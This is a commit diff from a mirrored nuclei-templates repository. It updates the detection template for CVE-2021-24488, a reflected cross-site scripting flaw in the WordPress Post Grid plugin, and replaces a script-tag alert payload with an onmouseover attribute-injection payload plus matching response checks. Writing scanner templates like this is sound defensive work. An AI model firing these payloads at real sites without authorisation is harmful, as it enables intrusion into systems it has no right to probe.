daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update CVE-2021-24488.yaml

patch-1
Prince Chaddha 2022-02-09 00:32:39 +05:30 committed by GitHub
parent 1dc5ff098a
commit a167a69be6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
cves/2021/CVE-2021-24488.yaml
View File

@ -27,7 +27,7 @@ requests:
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab="><script>alert(1)</script> HTTP/1.1
GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(document.domain)// HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
@ -36,10 +36,10 @@ requests:
- type: word
part: body
words:
- "><script>alert(1)</script>"
- "Post Grid Settings"
- 'value="\"onmouseover=alert(document.domain)/">'
- 'Post Grid'
condition: and
- type: status
status:
- 200
- 200